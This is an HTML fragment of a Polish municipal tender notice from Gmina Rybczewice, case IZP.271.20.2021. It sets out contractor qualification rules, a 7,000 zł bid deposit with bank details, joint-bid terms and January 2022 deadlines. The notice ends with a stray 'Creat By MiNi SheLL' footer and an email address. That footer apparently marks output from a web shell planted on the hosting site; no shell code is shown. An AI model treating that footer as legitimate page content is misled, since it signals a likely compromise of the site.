innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunek dotyczący kwalifikacji i doświadczenia osób skierowanych do realizacji zamówienia: <br/>Celem spełniania warunku Wykonawca wykaże, iż dysponuje lub będzie dysponował: <br/>a)	Wykonawca dysponuje osobami zdolnymi do realizacji zamówienia tj. Kierownikiem budowy posiadającym wymagane przez prawo uprawnienia do kierowania budową lub innymi robotami budowlanymi w specjalności konstrukcyjno-budowlanej<br/>Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych sytuacjach, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu,<br/>w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, zgodnego z<br/>wzorem stanowiącym Załącznik nr 4 do SWZ.<br/>2. odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, sporządzone nie wcześniej niż<br/>3 miesiące przed ich złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w<br/>celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 4 ustawy Pzp.<br/>3. oświadczenie wykonawcy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu<br/>ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym wykonawcą, który<br/>złożył odrębną ofertę, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z<br/>dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej niezależnie<br/>od innego wykonawcy należącego do tej samej grupy kapitałowej, zgodnego z wzorem stanowiącym Załącznik nr 5 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 8.1	Wykonawca zobowiązany jest, przed upływem terminu składania ofert, wnieść wadium w kwocie: 7 000,00 (słownie złotych: siedem tysięcy 00/100). <br/>8.2	Wadium może być wnoszone w jednej lub kilku następujących formach: <br/>8.2.1	pieniądzu; <br/>8.2.2	gwarancjach bankowych; <br/>8.2.3	gwarancjach ubezpieczeniowych; <br/>8.2.4	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju <br/>Przedsiębiorczości. <br/>8.3	Dokument potwierdzający wniesienie wadium w jednej z form wymienionych w pkt 8.2.2-8.2.4 SWZ musi być załączony do oferty w formie oryginału, <br/>tj. dokumentu elektronicznego, podpisanego kwalifikowanym podpisem elektronicznym, przez wystawcę dokumentu. Zamawiający nie dopuszcza złożenia tego dokumentu w jakiejkolwiek innej formie, np. pisemnej albo elektronicznej kopii opatrzonej kwalifikowanym podpisem elektronicznym. Beneficjentem takich dokumentów musi być Gmina Rybczewice Rybczewice Drugie 119, 21-065 Rybczewice. <br/>8.4	W przypadku wnoszenia wadium w pieniądzu kwotę należy wpłacić przelewem na rachunek bankowy Zamawiającego w Banku Spółdzielczy Bank Powiatowy w Piaskach nr rachunku 81 8689 0007 1000 0124 2000 0050. W tytule przelewu należy wpisać: „wadium w sprawie nr IZP.271.20.2021” <br/>8.5	Wadium wnoszone w pieniądzu jest wniesione skutecznie, jeżeli zostanie zaksięgowane na rachunku bankowym Zamawiającego przed upływem terminu składania ofert. <br/>8.6	Dowód wniesienia wadium w pieniądzu Zamawiający zaleca załączyć do oferty. <br/>8.7	Złożone poręczenie lub gwarancja muszą zawierać w swojej treści zobowiązanie zgodne z art. 98 ust. 6 pkt 1, 2 i 3 ustawy Pzp. <br/>Zwrot bądź zatrzymanie wadium nastąpi zgodnie z art. 98 ustawy Pzp <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zamawiający dopuszcza możliwość składania oferty przez dwóch lub więcej Wykonawców (w<br/>ramach oferty wspólnej w rozumieniu art. 58 ustawy Pzp) pod warunkiem, że taka oferta<br/>spełniać będzie następujące wymagania:<br/>1 Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do<br/>reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia<br/>umowy w sprawie przedmiotowego zamówienia publicznego.<br/>2 Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z<br/>pełnomocnikiem, którego adres należy wpisać w Formularzu oferty.<br/>3 Pełnomocnictwo lub inny dokument (np. umowa konsorcjum, spółki cywilnej) z którego wynika<br/>takie pełnomocnictwo należy złożyć razem z ofertą.<br/>4 W odniesieniu do warunków określonych w pkt 7.2 SWZ, wymagania te muszą być spełnione<br/>wspólnie przez Wykonawców składających ofertę wspólną (nie musi ich spełniać osobno każdy z<br/>Wykonawców składających ofertę wspólną). Na ich potwierdzenie należy złożyć dokumenty<br/>określone w pkt 10.4 SWZ.<br/>5 Każdy z Wykonawców wspólnie ubiegających się o zamówienie składa oświadczenie zgodne z<br/>treścią Załącznika Nr 2 do SWZ, aktualne na dzień składania ofert, celem potwierdzenia, że<br/>każdy z Wykonawców ubiegających się wspólnie o zamówienie nie podlega wykluczeniu z<br/>postępowania na podstawie art. 108 ust. 1 oraz art. 109 ust. 1 pkt 4 ustawy Pzp oraz spełnia<br/>warunki udziału w postępowaniu określone w SWZ<br/>w zakresie, w którym każdy z nich wykazuje brak podstaw wykluczenia z postępowania oraz<br/>spełnia warunki udziału w postępowaniu.<br/>6 Każdy z Wykonawców występujących wspólnie obowiązany jest do wykazania braku podstaw<br/>do wykluczenia z postępowania o udzielenie zamówienia publicznego. W takim przypadku<br/>oświadczenia lub dokumenty wymienione w pkt 10.3 SWZ składa każdy z Wykonawców<br/>występujących wspólnie.<br/>7 Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach<br/>tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane. W<br/>takiej sytuacji wykonawcy są zobowiązani dołączyć do oferty oświadczenie, z którego wynika,<br/>które usługi wykonają poszczególni wykonawcy, wzór oświadczenia stanowi załącznik nr 8 do<br/>SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Ze względu na ograniczoną liczbę znaków do 4000 oraz zakres zmian przewidzianych w umowie, zamawiający informuje, że Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia opisano w paragrafie 20 wzoru umowy - zał. nr 8 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-01-12 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/ .</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-01-12 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-02-11</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com